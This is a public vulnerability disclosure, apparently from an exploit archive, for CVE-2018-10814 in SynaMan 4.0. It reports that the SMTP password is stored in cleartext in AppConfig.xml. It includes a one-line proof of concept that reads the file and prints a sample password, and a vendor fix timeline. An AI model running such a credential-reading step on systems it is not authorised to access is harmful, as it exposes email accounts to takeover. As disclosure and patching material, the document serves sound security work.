SynaMan 40 Build 1488 SMTP Credential Disclosure

`# Exploit Author: bzyo  
# CVE: CVE-2018-10814  
# Twitter: @bzyo_  
# Exploit Title: SynaMan 4.0 - Cleartext password SMTP settings  
# Date: 09-12-18  
# Vulnerable Software: SynaMan 4.0 build 1488  
# Vendor Homepage: http://web.synametrics.com/SynaMan.htm  
# Version: 4.0 build 1488  
# Software Link: http://web.synametrics.com/SynaManDownload.htm  
# Tested On: Windows 7 x86  
  
Description  
-----------------------------------------------------------------  
SynaMan 4.0 suffers from cleartext password storage for SMTP settings which would allow email account compromise  
  
Prerequisites  
-----------------------------------------------------------------  
Access to a system running Synaman 4 using a low-privileged user account  
  
Proof of Concept  
-----------------------------------------------------------------  
The password for the smtp email account is stored in plaintext in the AppConfig.xml configuration file. This file can be viewed by any local user of the system.  
  
C:\SynaMan\config>type AppConfig.xml  
<?xml version="1.0" encoding="UTF-8"?>  
<Configuration>  
<parameters>  
<parameter name="hasLoggedInOnce" type="4" value="true"></parameter>  
<parameter name="adminEmail" type="1" value="[email protected]"></parameter>  
<parameter name="smtpSecurity" type="1" value="None"></parameter>  
**truncated**  
<parameter name="smtpPassword" type="1" value="SuperSecret!"></parameter>  
<parameter name="ntServiceCommand" type="1" value="net start SynaMan"></parameter>  
<parameter name="mimicHtmlFiles" type="4" value="false"></parameter>  
</parameters>  
</Configuration>  
  
  
  
Timeline  
---------------------------------------------------------------------  
05-07-18: Vendor notified of vulnerabilities  
05-08-18: Vendor responded and will fix   
07-25-18: Vendor fixed in new release  
09-12-18: Submitted public disclosure  
  
  
`